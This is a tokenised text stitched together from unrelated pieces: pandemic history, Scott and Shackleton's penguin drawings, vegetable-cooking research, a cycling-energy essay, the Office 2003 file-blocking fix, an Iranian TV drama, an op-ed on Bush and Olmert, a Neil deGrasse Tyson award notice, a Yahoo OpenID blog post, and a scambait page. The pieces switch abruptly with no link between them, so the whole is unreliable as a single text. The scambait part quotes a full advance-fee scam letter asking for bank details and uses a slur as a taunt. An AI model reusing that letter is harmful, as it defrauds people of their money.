The disease is thought to have begun in Ethiopia or Egypt and spread northwards via ships transporting huge quantities of grain to the city 's great public granaries .
The bubonic plague killed an estimated 137 million worldwide
A now familiar tale of disease - ridden fleas , carried on the backs of ship - borne rats , the Plague of Justinian , as it came to be known , was in fact the first great pandemic of the bubonic plague .
From AD541 to 542 it killed 40 % of Constantinople 's population , with the Byzantine historian Procopius claiming that at its peak the plague was killing 10,000 people in the city every day .
The disease fanned out across the eastern Mediterranean , wiping out a quarter of the region 's population .
A second major outbreak in AD588 went further , spreading up into France , leaving an estimated final death toll for the disease of about 25 million .
Blackened skin
For the next 800 years , Europe was spared the misery of another pandemic , but in the middle of the 14th Century , the Plague of Justinian disease returned - only this time it bore another name .
Now known as the Black Death , thanks to the blackening of the skin which victims suffered through haemorrhaging under the skin , the disease arrived from Asia .
People fled in its path , but instead of escaping as they had hoped , they merely aided its spread across the continent .
Cholera is still a killer in the developing world
From 1347 to 1350 , the Black Death killed at least a quarter of Europe 's population - an estimated 25 million people .
There were similar bubonic plague outbreaks in Asia and the Middle East at the same time , indicating that it was a global pandemic .
Bubonic plague outbreaks occurred repeatedly in Europe , reportedly gathering strength with each generation , until the 1700s .
By then the estimated worldwide death toll for the bubonic plague had reached a dizzying 137 million .
Cities under threat
Urban areas were particularly affected by the Black Death , with the disease often claiming 50 % of the population in cities .
The next pandemic was also worse in cities , where poor sanitation provided a perfect breeding ground .
Cholera had been described by Portuguese physician Garcia de Orta in the 16th century , but it was in 1816 that the disease went truly global .
Spanish flu killed more people than World War I
Already endemic to India , the disease now spread along trade routes into Russia and Eastern Europe , before shifting to Western Europe and even North America .
The world has been ravaged by no less than seven cholera pandemics , six of them starting in the 19th Century , with every continent except Antarctica suffering outbreaks .
The most recent occurred in 1961 , starting in Indonesia , and though modern sanitation has curbed the disease 's power , it is still a killer today .
Young people hit
Cholera may have been the scourge of the 19th century , but in the 20th Century it was influenza .
During the last century there were three flu pandemics .
The first and worst , the Spanish flu , started in 1918 in three far - flung locations : Brest , in France ; Boston in the US ; and Freetown in Sierra Leone .
The disease had an incredibly high mortality rate and unusually people aged 20 - 40 were its victims rather than the old and weak .
It also moved across the globe with breathtaking speed , killing 25 million people in the course of six months ; a fifth of the world 's population was infected .
The disease disappeared almost as fast as it had appeared , but by then it had killed an estimated 40 million people , more than had died in World War I , which was coming to an end at the time .
For many years the precise strain of flu could not be identified , but new research conducted by the US Armed Forces Institute of Pathology indicates that it most probably originated in birds .
The signed chalk drawings are to be cleaned and restored
In pictures
Penguin sketches made by Captain Scott and Ernest Shackleton have been found in a basement at Cambridge University .
The legendary explorers drew the pictures on blackboards , probably for public lectures , in 1904 and 1909 .
Nobody knows how the fragile images , in need of cleaning and restoration , ended up at the University 's Scott Polar Research Institute .
Staff are appealing for donations to help preserve the signed chalk drawings and put them on public display .
Chalk and charm
" People often compare Scott and Shackleton in terms of their achievements as explorers and their leadership qualities , " said Dr Huw Lewis - Jones , the historian and curator of art who found the images .
" Now , albeit with a smile on our faces , we can judge their artistic abilities as well . "
Because they are so special we want to make sure that they are preserved for the future
Heather Lane , librarian
He said they were still trying to trace how the pictures arrived at the institute but he was sure they were authentic .
" Some people may think they look a little crude but I think they are incredibly charming , " he added .
" They were drawn at public lectures in front of an enthusiastic audience , to laughter and to cheers , and then signed with a flourish .
" It 's like having the explorers ' autographs , only more wonderful , because each has signed their name next to a hand - drawn penguin . "
Saved from obscurity
Scott made his drawing in 1904 , after returning from his voyage aboard the Discovery .
Shackleton , who also took part in the Discovery expedition , made his sketch five years later , after coming within 150 km ( 90 miles ) of the South Pole - the furthest south any group had been at the time .
" Because they are so special we want to make sure that they are preserved for the future , " said Heather Lane , librarian and keeper at the Scott Polar Research Institute .
" We 've managed to save these penguins from obscurity in the basement .
Now we want to get them cleaned and restored so that visitors can enjoy them . "
In a finding that defies conventional culinary wisdom , researchers in Italy report that cooking vegetables can preserve or even boost their nutritional value in comparison to their raw counterparts , depending on the cooking method used .
Their study is scheduled for the Dec. 26 issue of ACS ’ Journal of Agricultural and Food Chemistry , a bi-weekly publication .
Nicoletta Pellegrini and colleagues note that although many people maintain that eating raw vegetables is more nutritious than eating cooked ones , a small but growing number of studies suggest that cooking may actually increase the release of some nutrients .
However , scientists are seeking more complete data on the nutritional properties of cooked vegetables , the researchers say .
In the new study , the researchers evaluated the effects of three commonly - used Italian cooking practices — boiling , steaming , and frying — on the nutritional content of carrots , zucchini and broccoli .
Boiling and steaming maintained the antioxidant compounds of the vegetables , whereas frying caused a significantly higher loss of antioxidants in comparison to the water - based cooking methods , they say .
For broccoli , steaming actually increased its content of glucosinolates , a group of plant compounds touted for their cancer - fighting abilities .
The findings suggest that it may be possible to select a cooking method for each vegetable that can best preserve or improve its nutritional quality , the researchers say .
900 Miles per Gallon ( July 2 , 2005 )
Since I do a lot of errands on my bicycle , I looked up how many calories riding a bike burns : about 500 calories an hour if you weigh about 175 pounds like I do and ride about 15 MPH ( which is fairly fast , especially on a gentle upslope . )
A pound of human fat contains about 3,500 calories ( kilocalories , if you want to get technical , but let 's just stick with the common useage ) .
So riding at a good clip for seven hours would get you about 100 miles and burn one pound of fat .
That 's pretty efficient , is n't it ?
And sobering if you 're trying to lose weight .
If you bicycle an hour a day and do n't eat anything extra , you can lose a pound of fat a week .
( More if you add muscle mass , of course . )
But bicycling 15 MPH for an hour is not that easy ; you will definitely feel it by hour 's end .
We use the word " oil " for both petroleum and vegetable oil .
As you might expect , they are both chains of hydrocarbons .
As a result , a gallon of vegetable oil contains about the same calories as a gallon of gasoline ( 31,000 calories ) .
This is why biodiesel fuel works as a replacement for petroleum diesel .
Since a human can metabolize vegetable oil as fuel , then by simple extrapolation we can estimate that a human being could ride a bike 900 miles on a gallon of vegetable oil - - or lose about nine pounds of human fat on the ride .
That means that a mere 27 pounds of human fat would theoretically enable a rider to bike across the entire continental U.S.
Alternatively , the rider could sip 3 gallons of vegetable oil to provide the same calories .
Not a terribly enticing diet for a cross-country ride , but the take - away is simple : the human body is an extremely efficient engine , and it 's difficult to burn the enormous quanitity of energy stored in 10 pounds of human fat .
No wonder it 's hard to lose weight , and no wonder our nation ( and other developed nations ) are suffering an epidemic of obesity .
Here 's a good calorie chart if you want to accurately calculate the burn rate for your daily exercise .
The chart does n't include cleaning house or gardening , but both qualify as moderately strenuous forms of exercise .
* * *
copyright © 2005 Charles Hugh Smith .
All rights reserved in all media .
I would be honored if you linked this wEssay to your site , or printed a copy for your own use .
* * *
Update Microsoft has threatened to release a fix for an Office 2003 update that may well have the productivity suite work as intended once again .
As reported earlier Service Pack 3 for Office takes the unprecedented step of barring access to files created with earlier versions of the product .
Install the Service Pack and your stash of documents ( the ones you may be keeping for legal reasons ) are suddenly just so much wasted disk and tape space .
We are talking seriously restrictive measures here .
Office offers no warnings , the SP cannot be rolled back and there are no options that an average end - user can take to fix the problem .
Yes , that does indeed mean the lack of a dialog box saying :
" I am a sentient human being .
I can assess risk .
I can spell ‘ responsibility ’ and even , occasionally , assume it .
I really , really want / need to open this old Word document .
So go ahead , make my day . ”
Just :
It 's not a bug . . . .
Microsoft did issue a registry hack but covered it with dire warnings about how dangerous hacking the registry can be .
The word draconian seemed appropriate , so we used it with Reed Shaffner , Microsoft Office Worldwide Product Manager .
Very disarmingly , he agreed .
“ Yes , I agree , it was too draconian . ” he said .
We hate it when Product Managers do that .
He then went on to say that in response to the user feedback , Microsoft plans to issue a new fix in the very near future .
The fix will come in the form of a link that you can follow which will hack ( sorry , modify ) your registry for you so that the problem goes away .
And we 'll be providing that link as soon as possible .
Still , Shaffner was at pains to point out that using the fix leaves the machine open to the very vulnerability that the measure was designed to stop , so Microsoft would still advise people not to do this unless they have a very good reason .
He also supplied more information about the vulnerability .
He said that the problem was n’t in the file format as such ; it was in the code that is used to parse these earlier files .
We were just about to point out that this was Microsoft ’s code ( and , therefore Microsoft ’s fault ) but he beat us to it .
We hate it when they do that as well .
So , zero out of ten for the heavy handed SP but grudging respect for actually listening to users and fixing the problem . ®
Update
Since we filed this , Microsoft has in fact managed to post the Office fixes .
Travel over to this support site and look for the " How to enable blocked file types " heading .
UnblockWord.reg .
Lovely .
For seven months , millions of Iranians have turned on their television sets Monday at 10 p.m. to watch a World War II drama that challenges stereotypes about Iran and Judaism .
The story line could not be less likely in the Islamic Republic , whose president calls the Holocaust a " myth " :
An Iranian - Palestinian student in France helps save his love – a French Jew – and her family from the Nazis and from becoming victims of the Holocaust .
This week the 30 - part love story comes to a spectacular end with state - owned television broadcasting an encore presentation of the final episode , which includes a shootout amid the ancient ruins of Persepolis .
The message of the series , says director Hassan Fathi , is that " what is endangering peace is extremist thinking , and political hard - liners that separate people from each other .
God created people to love each other , regardless of religion ....
Unfortunately [ when it comes to ] religion the current of extremism is always on , creating misunderstanding between cultures . "
The Iranian hero and his Jewish love are finally united in the last scene at the foot of Iran 's snow - covered Damavand mountain , ending a saga sympathetic to the fate of European Jews .
The series is fiction , but inspired by Abdol Hussein Sardari , a real - life Iranian consul in Paris who issued Iranian passports to more than 1,000 European Jews during World War II so they could flee .
The tale surprised many Iranians with its apparent challenge to President Mahmoud Ahmadinejad 's statements about the Holocaust .
But " Zero Degree Turn " highlights another message commonly lost amid fierce anti-Israel rhetoric :
That Iran and many Iranians differentiate between Jews , who are meant to be accepted by Muslims as fellow monotheists and " people of the book ; " and Zionism , which is officially vilified in Iran as the destructive ideology of Israel .
That difference is often highlighted by Iran 's estimated 25,000 Jews , who form the largest Jewish community in the Middle East outside Israel .
" Of course , nothing in cinema and television will be complete [ but ] overall , we think the whole story is a positive point for Jews in Iran , " says Ciamak Moresadegh , chairman of the Tehran Jewish Committee , which wrote a letter of thanks to Iran 's state - owned television .
" The problems between the Zionist movement and Iran are not related to the Jewish population in Iran , " says Mr. Moresadegh .
The TV drama " helps make this clear . "
A large number of Jews left Iran after the 1979 Islamic Revolution , and many were purged as untrustworthy from the military officer corps and other professions .
The exodus has slowed considerably , but continues .
Judaism is an officially sanctioned religion , and Jews are allotted one seat in Iran 's parliament .
But the Jewish community has sometimes come under pressure ; several Jews arrested in 1999 were charged with spying for Israel .
Mr. Ahmadinejad says the six million killed in the Holocaust are a modern exaggeration used by the West to create Israel on occupied Muslim lands ; and not a birthright of Jews who consider Israel a land promised them by God .
He routinely decries Israel , saying the Jewish state will be " wiped from the face of time . "
The final episode of " Zero Degree Turn " shows Nazi Germany in favor of the Zionist enterprise as a way of moving Jews out of Europe .
In the story , the Zionist uncle – who tries to keep the Iranian Muslim and his Jewish niece apart , sometimes at the point of a gun – is seen in a synagogue , expounding on the virtues of Zionism .
" Any Jew who lives outside Palestine is not a Jew . "
The series could not have come at a more relevant time for Iranians .
The president hosted a Holocaust conference last December that featured Holocaust deniers .
In a bid to reassure the Jewish community , Iran 's foreign ministry in March facilitated a diplomatic tour of Jewish facilities in Tehran .
The magnified relevance of the series has been coincidence , says Mr. Fathi , a veteran director of historical fiction .
" I decided to produce this series in 2002 , and in those days the Holocaust was not an issue , " he says .
" Even if one single Jew is killed in German camps , the world should be ashamed .
By the same token , if a single Palestinian dies , the world should be ashamed , " says Fathi .
" I sympathize with the Jewish victims of World War II , to the same extent [ I sympathize ] with women and children victims of the war in Palestine . "
The TV series is one of the most expensive and elaborate ever produced here , with period costumes on location in Paris , Budapest , and cities in Iran .
Iranian viewers say the love story and its iconoclastic content kept them glued to their sets Monday nights .
" This was the most professional TV series in Iranian history .
Everybody watched it , " says one regular viewer .
" The first episodes were counter to what President Ahmadinejad was saying , and showed the Holocaust existed , so it was not clear what the signals were . "
But it was not long before the differences between Judaism and Zionism were made clear , a point made by Ali Akbar Velayati , a foreign affairs adviser to Iran 's supreme leader .
His live commentary immediately after the final segment was advertised during the show by a ticker along the bottom of the screen .
" The European policies created Zionism more than the Jews [ though ] extremist Jews had a role .
The Jews are victims , and Muslims were the same , " asserted Mr. Velayati .
" Europeans fighting Jews , the last time in Germany , has historic roots .
And the correlation between Zionism and Nazis is known . "
The political subtext was secondary to the story for many Iranians .
Iranian character Habib Parsa 's pursuit of his Jewish heartthrob , Sarah , lands him in prison three times .
She also surmounts constant challenges and then is waiting in the falling snow when Habib — much older — is released from prison .
" It was a very tough night for me , " says Fathi of the final episode .
" But I was so happy Sarah and Habib got together .
The days that God is very happy are the days that people from different cultures hug each other in brotherhood . "
Which of the two men is the leader of the greatest power on earth and which is the boss of a small client state ?
A visitor from another planet , attending the press conference in Jerusalem , would find it hard not to answer :
Olmert is the president of the great power , Bush is his vassal .
Olmert is taller .
He talked endlessly , while Bush listened patiently .
While Olmert anointed Bush with flattery that would have made a Byzantine emperor blush , it was quite clear that it is Olmert who decides policy , while Bush humbly accepts the Israeli diktat .
And Bush ’s flattery of Olmert exceeded even Olmert ’s flattery of Bush .
Both , we learned , are " courageous . "
Both are " determined . "
Both have a " vision . "
The word " vision , " once reserved for prophets , starred in every second sentence .
( Bush could not know that in Israel , " vision " has long become a jocular appellation for highfalutin speeches , usually in combination with the word " Zionism . " )
The president and the prime minister have something else in common : not a word of what they said at the press conference had any connection with the truth .
One of the most moving dramas in the Bible tells about our old , blind forefather , Isaac , who wanted to bless his eldest son , Esau , a reddish and hairy hunter .
But the second son , the homebody ( or rather tent - body ) Jacob , exploited the absence of his brother and went to his father in order to steal the blessing .
He wore Esau ’s clothes and covered his arms with hairy goat skins .
The ruse nearly failed when the father felt the arms of Jacob and his suspicion was aroused .
That ’s when he uttered the famous words :
" The voice is Jacob ’s voice , but the hands are the hands of Esau " ( Genesis 27 : 22 ) .
Yet Jacob , the impostor , did receive the blessing and became the father of the nation which was named after him ( he was also called Israel ) .
It seems that Ehud Olmert is a true successor : there is no connection between his voice and his hands .
Anyone who listens to him  not just at the press conference , but also on every other occasion  hears words of peace and reason :
The Palestinians must have a state of their own .
The " vision " must be realized while Bush is president , because Israel has never had and never will have a truer friend .
The settlement outposts must be removed , as promised by us again and again .
The settlements must be frozen .
Etc. , etc .
That is the voice of Jacob .
But the hands , well , they are the hands of Esau .
Before Annapolis , during Annapolis , and after Annapolis , nothing at all was done to promote the Two - State Solution .
The negotiations were about to begin  any moment now  a year ago , and now they are again about to begin  any moment now .
Yes , the " core issues "  borders , Jerusalem , refugees  will be addressed .
Sure .
Any moment now .
But in the meantime , the hands of Esau are working feverishly .
All over the occupied territories , the settlements are being enlarged .
The existing outposts remain untouched ; new ones spring up from time to time .
Around them , a well - choreographed dance has evolved , a kind of formal ballet executed by the settlers and the army .
The settlers set up a new outpost , the army removes it , the settlers return and set it up again , the army dismantles , and so forth .
In the meantime , the outpost gets bigger and bigger .
The government connects it to the electricity and water systems and builds a road .
And the army , of course , protects it day and night .
We cannot leave good Jews at the mercy of the evil Palestinian terrorists , can we ?
Bush knows all this and still continues to blabber that " the illegal outposts must be removed . "
And so it continues : the voice is Jacob ’s voice , the hands are the hands of Esau .
But one cannot fool all of the people all of the time , to quote another American president who was slightly more intelligent than the present incumbent .
And so , after Olmert and Bush repeated the mantra about removing the outposts and freezing the settlements , one of the journalists popped an innocent question :
How does this fit together with the announcement about the building of a huge new housing project at Har Homa ?
If anyone thought that this would embarrass Olmert , he was sadly mistaken .
Olmert just can not be embarrassed .
He simply answered that this promise does not apply to Jerusalem , nor to the " Jewish population centers " beyond the Green Line .
" Jerusalem "  since the time of Levy Eshkol  is not only the Old City and the Holy Basin .
It is the huge tract of land annexed to Israel after the Six - Day War , from the approaches to Bethlehem to the outskirts of Ramallah .
This area includes the hill that was once forested and called Jebel Abu - Ghneim , now the site of the big and ugly Har Homa settlement .
And the " population centers " are the big settlement blocs in the occupied Palestinian territories , which President Bush so generously presented to Ariel Sharon .
This means that almost all the extensive building activities that are now going on beyond the Green Line are not covered by the Israeli undertaking to freeze the settlements .
And while Olmert publicly announced this , President Bush was standing at his side , smiling foolishly and painting on another layer of compliments .
The following day , Bush visited Mahmoud Abbas in Ramallah and told the shocked Palestinians that the innumerable Israeli roadblocks in the West Bank , which turn the life of the Palestinians into hell , are necessary for the protection of Israel and must remain where they are  until after the establishment of the hoped - for democratic Palestinian state .
Condoleezza
Rice was quick to remind him in private that this was not very wise , since he was about to visit half a dozen Arab countries .
So Bush hastened to call another press conference in Jerusalem , talking about the " core issues " : there would be a " contiguous " Palestinian state , but the 1949 borders ( the Green Line ) would not be restored .
He would not speak about Jerusalem .
Also , the refugee problem would be settled by an international fund  meaning that none at all would be allowed to return .
Altogether , much less than Bill Clinton ’s 2000 " parameters , " and less than most Israelis are already prepared to accept .
It amounts to 110 - percent support for the official Israeli government line .
After that , Bush had dinner with Israeli cabinet ministers .
He cordially shook the hand of Minister Rafael Eitan , the former spymaster who controlled the Israeli spy in Washington , Jonathan Pollard , whom Bush refuses to pardon .
( Eitan would be arrested the moment he set foot on American soil . )
He spoke cordially with the ultra-rightist Minister Avigdor Lieberman , urging him to support Olmert .
Throughout the dinner , he talked and talked , until Condi sent him a discreet note suggesting that he shut up .
Bush , in high spirits , read the note out loud .
I have mentioned more than once the British World War II poster which was pasted up on the walls in Palestine : " Is this trip really necessary ? "
That is again the question now :
Is this trip of Bush ’s really necessary ?
The answer is : Of course .
Necessary for Bush .
Necessary for Olmert .
Necessary for Abbas , too .
For Bush , because he is a lame duck , in the last year of his term , and therefore almost paralyzed .
In the United States he is rapidly becoming irrelevant .
His touted Middle East tour has been drowned out by the primary elections mayhem , which produces a new drama almost every day .
While Hillary wrestles with Obama and the glib Bill competes with an impressive black grandma , who cares where the worst president in American history is traipsing around ?
Olmert is well aware of the situation .
When he declares that the last year of the term of his noble friend must be used , what he really means to say is he cannot exert any pressure on us , he cannot even " nudge " us , as he promises .
There is no need to remove even one single outpost for him .
So let us squeeze the last drop of juice out of his presidency , before he is thrown onto the trash pile of history .
But Olmert needs the presence of Bush at his side , because his position is not much more secure than Bush ’s .
Bush is bankrupt in a big way , after starting one of the most pointless and unsuccessful wars in U.S. history .
That is true for Olmert in a small way .
He is bankrupt too , and he also started a pointless , failed war .
In two weeks time , the Winograd Commission will publish its final report on Lebanon War II , and everyone expects it to come down on Olmert like a 16 - ton weight .
He may survive , if only because there is now no credible substitute .
But he needs all the help he can get  and what better help than the " Leader of the Free World " gazing at him with liquid eyes ?
It ’s the old story about the lame and the blind .
This was not Bush ’s last presidential visit to Israel .
He has already promised to return on the 60th anniversary of the founding of the state , which falls this year ( in accordance with the Hebrew calendar ) on May 8 .
What else can a president do in his last months in office , except star in ceremonies with kings , presidents , and prime ministers ?
Perhaps he had intended to finish with a big bang , a historic climax that would overshadow even his invasions of Afghanistan and Iraq , such as a grand attack on Iran .
But it seems that the U.S. intelligence community , in a patriotic act that makes up for some of its earlier sins , has prevented this by publishing its sensational report .
True , this week something happened that put on a warning light .
Some small Iranian boats were reported to have made a provocative gesture against the powerful American warships in the Strait of Hormuz .
That takes us right back to 1964 and to what has become known as the " Gulf of Tonkin incident . "
President Lyndon Johnson announced that Vietnamese vessels had attacked American warships .
That was a lie , but it was enough for Congress to empower the president to widen the war that killed millions of people ( and buried Johnson ’s career ) .
But this time the red light went out quickly .
The U.S. Congress is not what it was , it seems that the Americans have no stomach for another war , the historical parallel was too obvious .
Bush has been left without an option for war .
He has been left with nothing .
Apart from Olmert ’s flattery , of course .
BOSTON -- The American Association for the Advancement of Science has named astrophysicist Neil deGrasse Tyson , director of the Hayden Planetarium at the American Museum of Natural History in New York City , as winner of the 2007 AAAS Public Understanding of Science and Technology Award .
Tyson was cited for his passionate commitment , sustained excellence , and dynamic leadership in engaging the public in the frontiers of science .
He will receive the award during a 16 February ceremony at the 2008 AAAS Annual Meeting in Boston .
Historically , Tyson said , scientists have not always been quick to recognize the importance of popularizing their work for the general public .
The AAAS prize , he said , " represents a deeper level of appreciation " from his colleagues on the value of such outreach efforts .
Tyson 's efforts , whose own outreach efforts are aided by the intrinsic public fascination with cosmic topics such as planets and black holes , said all scientists should consider ways to engage the public by such means as visiting local schools , agreeing to press interviews despite busy schedules , and writing op - ed pieces for local newspapers .
" Tyson is one of the most highly visible and effective spokespersons for science today , " wrote Robert Hazen , professor of earth science at George Mason University , in his letter nominating Tyson for the AAAS award .
" Some have called him the next Carl Sagan .
With his seemingly weekly appearances on PBS , network TV , and such nontraditional venues as Comedy Central , Neil Tyson reaches a vast audience of nonscientists . "
A Time magazine article announcing Tyson as one of the 100 most influential people in the world in 2007 also made the Sagan comparison , adding " as long as you envision a Sagan who 's muscular , African American and as cool as his predecessor was geeky . "
Since 1995 , Tyson has written the monthly " Universe " column for Natural History magazine , an American Museum of Natural History publication that has a circulation of about 250,000 .
His September 2003 column , " In the Beginning , " won the American Institute of Physics science writing prize in 2005 .
A collection of his columns , published in 2007 as " Death by Black Hole : And Other Cosmic Quandaries , " reached the New York Times Bestseller List .
As of fall 2006 , Tyson has been on - camera host of " NOVA ScienceNOW " on PBS .
The magazine - style episodes include reports from the field and cover timely developments and intriguing personalities in science and technology .
" I love it to death , " Tyson said of his host position for ScienceNow .
" The TV audience is the world 's largest classroom . "
Tyson has also lent a hand to policymakers .
In 2004 , he was appointed by President George W. Bush to serve on a nine - member Commission on the Implementation of United States Space Exploration Policy dubbed the " Moon , Mars , and Beyond " commission .
This group made recommendations on ways to carry out a new vision for U.S. space exploration .
As a writer in residence at New York 's Yeshiva University in fall 2005 , Tyson led a science and nature writing seminar for the department of English .
He also has taught undergraduate astronomy courses , including a course on the universe for non-science majors while he was a visiting lecturer at Princeton University .
In addition to his science communication work , Tyson is a researcher in the department of astrophysics at the American Museum of Natural History .
He continues to publish in scholarly journals .
His research interests include star formation , exploding stars , dwarf galaxies , and the structure of our Milky Way .
Tyson obtains his data from the Hubble Space Telescope , as well as from telescopes in California , New Mexico , Arizona , and in the Andes Mountains of Chile .
Tyson graduated from the Bronx High School of Science in June 1976 .
He earned a bachelor 's degree in physics from Harvard University in 1980 and a master 's degree in astronomy in 1983 from the University of Texas , where he researched star formation models for dwarf galaxies .
He received his Ph.D. degree from Columbia University in 1991 .
His doctoral research involved chemical evolution , abundances and structure related to the galactic bulge .
The International Astronomical Union named an asteroid " 13123 Tyson " in his honor , and - on a lighter note - People magazine named him " Sexiest Astrophysicist Alive " in 2000 .
Established in 1987 , the AAAS Award for Public Understanding of Science & Technology recognizes scientists or engineers who , while working in their fields , have also contributed substantially to public understanding of science and technology .
Contributions include books , articles in magazines and newspaper , broadcasting , lecturing , museum presentation and exhibit design .
###
The American Association for the Advancement of Science ( AAAS ) is the world 's largest general scientific society , and publisher of the journal , Science ( www.sciencemag.org).
AAAS was founded in 1848 , and serves 262 affiliated societies and academies of science , reaching 10 million individuals .
Science has the largest paid circulation of any peer - reviewed general science journal in the world , with an estimated total readership of 1 million .
The non-profit AAAS ( www.aaas.org) is open to all and fulfills its mission to " advance science and serve society " through initiatives in science policy , international programs , science education and more .
For the latest research news , log onto EurekAlert ! , www.eurekalert.org, the premier science - news Web site , a service of AAAS .
Yahoo ! , Flickr , OpenID and Identity Projection
Via ReadWriteWeb , view source on a Flickr photostream page and search for “ openid ” and you ’ll be rewarded with the following snippet :
< link rel= " openid2.provider " href = " https://open.login.yahooapis.com/openid/op/auth " />
Which means that Flickr pages will very soon be able to act as OpenIDs .
The provider is n’t up and running just yet though ; try authenticating with your Flickr OpenID on Jyte.com and you ’ll get the following message :
Hey there !
You have stopped by a bit sooner than we had expected .
This feature is still being tested , so please check back in a few days .
The URL of the server is interesting as well : it suggests that Yahoo ! ’s OpenID support is designed from the start to apply to more than just Flickr .
I would n’t be at all surprised to see similar links start to crop up on all kinds of other Yahoo !
properties — anything that has a page which can be considered to represent a user account .
This would make a lot of sense , because OpenID is good for more than just authentication .
The OpenID protocol allows a user to assert ownership of a URL .
This can be used for SSO - style authentication , but it can also be used to prove ownership of a specific account to some other service , a concept I ’ve been calling identity projection .
If users can easily project their Flickr , Upcoming or del.icio.us identities to other sites , developers can start to build all kinds of neat things .
Mashups for one get a whole lot more interesting when new users can easily bring their existing profiles from other sites with them .
With any luck we ’ll see Yahoo !
start to adopt OAuth for authenticated API calls ( which is itself based in part on the Flickr auth API ) in the not too distant future , opening up even more possibilities .
A common misconception about OpenID is that it ’s only really useful if users stick to using one identity .
I ’d be happy to see every one of my online profiles acting as an OpenID , not for SSO authentication ( I ’ll pick one “ primary ” OpenID to use for that ) but so that I can selectively cross-pollinate some of my profiles to new services .
Back to Yahoo ! , another interesting new URL is https://me.yahoo.com/.
Again , there ’s not much to see at the moment but it looks to me like this will become an endpoint for OpenID 2 directed identity .
James Henstridge provides a useful explanation here , but the short version is that you ’ll be able to enter “ me.yahoo.com ” in to an OpenID field on a site and have Yahoo !
pick an obfuscated , unique OpenID for your interactions with that site .
This protects your privacy by preventing anyone from outside of Yahoo !
from correlating your behaviour across multiple OpenID - enabled services , similar to how Yahoo ! ’s current BBAuth API provides applications with an opaque hash rather than a user ’s Yahoo ! screen name .
It looks like Yahoo ! will only be supporting OpenID 2 and wo n’t provide a fallback for OpenID 1.x consumers .
This means you wo n’t be able to use your Flickr OpenID on many existing consumer sites ( including this blog ) , at least until they get around to updating their libraries .
I expect Yahoo ! ’s implementation to be a major influence in encouraging OpenID 2 adoption .
It ’s three weeks short of a year since I launched idproxy .
net , which provides Yahoo !
account holders with a third - party OpenID via the BBAuth API .
I could n’t be happier to see Yahoo !
taking steps towards cutting out the middle man .
Title : I PRAY TO DIE HENCEFORTH
Scammer Name : John Ademola
Submitted By : Shiver Metimbers
A tale of love , lust , loss and greed when the X Files meets The Matrix .
Good people , please remember Fags in your prayers .......
A small note :
This particular scambait of course has references to the derogatory term for a homosexual .
I would like to make it clear that this is for the purposes of this scambait only .
Homosexuality is a big taboo subject in some parts of Western Africa , and being accused of it is amongst the most insulting things you can do to a person there , which is exactly my reason for the use of certain terms here in this scambait towards this particular scammer .
It is not my intention to insult any actual ( non-criminal ! ) homosexuals out there .
From : " Mr john ademola " < [ email protected ] >
To : < [ a non related email account ! ] >
Date : Fri , 29 Aug 2003 00:27:11 +0200
Subject : URGENT BUSINESS ASSISTANCE
Attn : President / CEO ,
First , I must solicit your confidant in this transaction , this is by virtue of its nature as utterly CONFIDENTIAL and TOP SECRET .
Though I know that the transaction of this magnitude will make any one apprehensive and worried , but I am assuring you that all will be well at the end of the day .
We have decided to contact you due to the urgency of this transaction , as we have been reliably informed of your discreteness and ability in transaction of this nature .
Let me start by first introducing myself properly to you , I am williams kenny [ WILLIAMS KENNY - remember that !] a director with the Nigerian National Petroleum Corporation ( NNPC ) Eleme Refinery .
I came to know of you in my private search for a reliable and reputable person to handle the confidential transaction , which involves the transfer of a huge sum of money to a foreign account requiring maximum confidence .
THE PROPOSITION : a foreigner , Engineer James Akmed , an Oil Merchant / Contractor with the Federal Government of Nigeria , until his suspension three years ago , executed with us at Eleme Refinery of NNPC , and had a total contract executed worth US $ 28.6 ( Twenty Eight Million , Six Hundred Thousand United States Dollar ) which flows in the Corporation 's suspense account .
It is because of the allegation / petition leveled against him that he ( Engr. James Akmed ) who is a close friend to the late dictatorship General Sanni Abacha ( formal Military President of Nigeria ) who died in office in 1998 and during his tenure the country experienced various mismanagement and series of malpractices were carried out in collaboration with his foreign friends .
However , a Panel were set up to investigate the issue , who found him ( Engr. James Akmed ) guilty and the present Democratic President of Nigeria Chief Olusegun Obasanjo suspended him from transacting any business in Nigeria with immediate effect and was asked to leave the country .
However , these made the contract fund " UNCLAIMABLE " which was only known to my colleagues and I .
Fortunately , all the Contract document including the " CONTRACT COMPLETION CERTIFICATE " are with me but the need for a very trustworthy foreign business man / woman whom I would present as the Foreign contractor / beneficiary to claim the fund .
In order to achieve this development , some of my colleagues and I now seek your permission to have you stand as the FOREIGN CONTRACTOR so that the funds would be released and paid into your account as beneficiary 's who executed the contract in the year 1999 .
All documents and proves to enable you get this fund will be carefully worked out .
More so , we are assuring you of a 100 % risk free involvement .
Your share stays while the rest would be for me and my colleagues for investment purposes in your country .
We have agree that , the funds be shared thus , after it has been transferred into your nominated account : ( 1 ) 30 % of the money will go to you for acting as the beneficiary of the fund .
( 2. ) 5 % will be set aside for reimbursement to both parties for any incidental expenses that may be incurred in the cause of the transfer .
( 3 ) . 65 % to us the originator of the transaction .
If this proposal is acceptable by you , do not make undue advantage of the trust we have bestowed on you and your Company , kindly get to me immediately on my E-mail Address as stated bellow .
Please furnish me with your most confidential Telephone and Fax Number(s ) , Company Name to use , Banking information including the A/C Number , Swift Code ( if any ) .
I assure you that if you will follow my instruction , the fund shall be in your Account within 7 - 10 days of this transaction .
Thanking you for your kind understanding in this regard .
My best regards ,
ENGR .
JOHN ADEMOLA ( MNSE )
[ So , as noted previously , numb - nuts starts off by introducing himself as ' Williams Kenny ' and signs off with John Ademola !
I 'll let that fly for now . ]
To : [ email protected ]
From : Gillian Anderson My dear Mr.Ademola ,
I was surprised to receive your kind email , as I do not understand where you found my private email address , however your offer sounds interesting to me .
Please explain a little more to me and please will you forward me some kind of identification ?
Love ,
Miss Gillian Anderson .
Clock Zone Ltd. Date : Wed , 3 Sep 2003 04:59:19 - 0700 ( PDT )
From : john ademola
Subject : URGENT BUSINESS ASSISTANCE
Dear Miss Gillian Anderson .
How are you and your family ?
My good friend I got your mail thanks very much .
For your express interest in my proposal .
Sister regard your request i forward to you some kind of my identification , my sister i will send to you my photo when i hear from you and receive all the information i needed from you regard the approval of this fund in your name .
My friend if you are currently in events regard this country Nigeria you will know fully well that all the top government officials had used this means greatly enrich themselves by transferring / lodging funds into their foreign partner 's bank account for their personal use , because we government officials are not allowed by law to operate foreign account , I took advantage of the situation , and placed this money in a Suspense Account with the Central Bank Nigeria , which I claimed was a fee owed to a foreign contractor .
I know that You have been receiving different e-mails of different stories but this is real and no crime is attached to it ,
